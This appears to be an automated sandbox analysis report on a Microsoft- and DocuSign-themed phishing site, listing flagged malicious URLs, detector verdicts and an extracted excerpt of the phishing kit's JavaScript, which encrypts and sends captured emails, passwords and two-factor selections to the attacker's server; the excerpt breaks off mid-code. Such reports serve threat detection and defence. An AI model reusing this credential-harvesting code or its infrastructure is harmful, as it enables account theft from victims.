Click to jump to signature section
Source: https://mllss.ablecenp.ru/9adosd/?Z | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/90RbfegwzCgg2x5125YhvQjshab80 | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/uvWfrw2DYZZsbHnkjqkstTmQkIfk5jGfh412126 | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/78MZYcLVHHqGrMjLY23n297cJuv54 | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/12Okb0G715SKh7yabtZm8919 | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/kcgr4If1Ay0NrpLsA7GMFNCTL5j8p7n3Ue5JitjXtT9bwrIvNZQTY33Cgz | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/yzh3pCKtx2M78uj3T1op50 | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/klEZEIkxrqLti6SW5Bi0kZrbmbAU1pIscEup3jdGBd6kl2ZW98wsGRQAke7WCDOycofwx220 | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/efwbe6BdOMthO23yyTD1fbEIl7luvtuRLyfboI4LB0sCD3yEiG78150 | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/favicon.ico | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/wxx2M5Jdm9gg3qBffFoJIJopt5UabJPIc8FXwxuEsbkhsJTk2VJab180 | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/qrScU3ZeGM5FxMsDy6rWLDvBXIAYzLw4WYBaaSA6N4WN6jy9btstp5K5ItKNwK9ybAjeOfS8wnCFef240 | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/ef8ZxeqCESOGNShRLG69JSw78zDjNJfw78xmn93 | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/56wWvXQ5TSc4DKXixdYguFXyltDcghILTqHSiXNkgEo3x889102 | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/ij2qqMjEJ9AKbaJXrnCNuDneQHNDtEzo7NWfheA0KKkleaFErlGIXFvgGUurqE12209 | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/450u6Xnyf74XAGErQEY17J89Tqk8QDZaxy66 | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/xy3ZBqB2BSbAQ1pqXmDef23 | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/klhcEBn0FQQTX11dTIg19JdwxVLcgaa7uTOfF72dK878170 | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/uvCUdkHAVj9eBSz09pg0heMHUWydYnv1oq1qgU3fY8pqw1dr67ZnBcZ3RpszrMxfMadpMvHBXGomgCLWKAgh256 | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/klIy4hfSdFjCeQFeuZBahXh1SxKUZVaVn2gQslopdJc1GyLsadJrBQjz78BSy21fpYWk49bDTab230 | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/ypcDzD2LptOQ9lCWl5lF4jfIZMvQMphD8tsTtHthykR08macq | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/rsXtw3W2TBidIqgwnqJpSiMshRQIVyjbPXJhKbOghqLwzP6SLnK9TEIjQef194 | Avira URL Cloud: Label: malware |
Source: https://mllss.ablecenp.ru/rsVEKuFJEXd12frcBawx38 | Avira URL Cloud: Label: malware |
Source: https://midlandlangarsevasociety-my.sharepoint.com | LLM: Score: 7 brands: DocuSign Reasons: The URL 'https://midlandlangarsevasociety-my.sharepoint.com' does not match the legitimate domain for DocuSign, which is 'docusign.com'. The page uses urgency and secure document language, common social engineering techniques in phishing attacks. The domain appears to be a SharePoint site, which is unusual for a DocuSign document delivery. DOM: 0.0.pages.csv |
Source: https://mllss.ablecenp.ru | LLM: Score: 9 brands: Microsoft Reasons: The URL 'mllss.ablecenp.ru' does not match the legitimate domain name 'microsoft.com' associated with the brand Microsoft. The presence of a login form on a suspicious domain is a common phishing technique. The domain name appears to be unrelated to Microsoft, which raises significant suspicion. DOM: 6.16.pages.csv |
Source: Yara match | File source: 6.16.pages.csv, type: HTML |
Source: Yara match | File source: 6.17.pages.csv, type: HTML |
Source: https://mllss.ablecenp.ru/9adosd/ | LLM: Score: 8 Reasons: The provided JavaScript code fetches content from an external URL and then decodes and writes potentially malicious HTML content directly into the document. This behavior is characteristic of phishing or malicious sites attempting to inject harmful scripts or content. The use of 'atob' and 'decodeURIComponent' to decode base64-encoded content further suggests an attempt to obfuscate the payload, which is a common tactic in malicious scripts. DOM: 4.7.pages.csv |
Source: https://mllss.ablecenp.ru/9adosd/ | HTTP Parser: Base64 decoded: <script> |
Source: https://mllss.ablecenp.ru/55609806740817527513539MJRXZXDNGXRELAZZMDRTTQBBC?RORDPJPTKKIKJSG721280149402424MNLWRGLJWWGOFQN | Matcher: Found strong image similarity, brand: MICROSOFT |
Source: https://mllss.ablecenp.ru/55609806740817527513539MJRXZXDNGXRELAZZMDRTTQBBC?RORDPJPTKKIKJSG721280149402424MNLWRGLJWWGOFQN | Matcher: Template: microsoft matched |
Source: https://mllss.ablecenp.ru/55609806740817527513539MJRXZXDNGXRELAZZMDRTTQBBC?RORDPJPTKKIKJSG721280149402424MNLWRGLJWWGOFQN | Matcher: Template: microsoft matched |
Source: https://mllss.ablecenp.ru/9adosd/ | Matcher: Template: captcha matched |
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/6sb2m/0x4AAAAAAAanW_YR_5ihkFoc/auto/normal | Matcher: Template: captcha matched |
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/6sb2m/0x4AAAAAAAanW_YR_5ihkFoc/auto/normal | Matcher: Template: captcha matched |
Source: https://mllss.ablecenp.ru/55609806740817527513539MJRXZXDNGXRELAZZMDRTTQBBC?RORDPJPTKKIKJSG721280149402424MNLWRGLJWWGOFQN | HTTP Parser: var websitenames = ["godaddy"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "FOee";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "kcgr4If1Ay0NrpLsA7GMFNCTL5j8p7n3Ue5JitjXtT9bwrIvNZQTY33Cgz";var gdf = "ijJb0oHJul0tKVhEnVuvceGyI9xin6baTvHcd111";var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome|chromium|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;}if(route == "checkpass"){randpattern = /(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;}if(route == "twofaselect"){randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;}if(route == "twofaselected"){randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, |